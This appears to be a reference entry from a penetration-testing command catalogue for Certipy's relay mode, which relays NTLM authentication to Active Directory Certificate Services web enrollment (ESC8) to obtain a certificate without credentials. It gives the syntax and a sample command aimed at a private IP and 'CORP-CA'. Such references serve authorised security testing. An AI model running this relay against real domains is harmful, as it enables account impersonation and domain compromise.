Certipy Relay to ADCS

Relay NTLM authentication to ADCS web enrollment to obtain a certificate

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
no credentials
Protocols
NTLM, HTTP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy relay -target 'http://<ip>/certsrv/certfnsh.asp' -ca '<ca_name>'

Examples

certipy relay -target 'http://192.168.1.100/certsrv/certfnsh.asp' -ca 'CORP-CA'

Tags

certipy adcs relay esc8 web-enrollment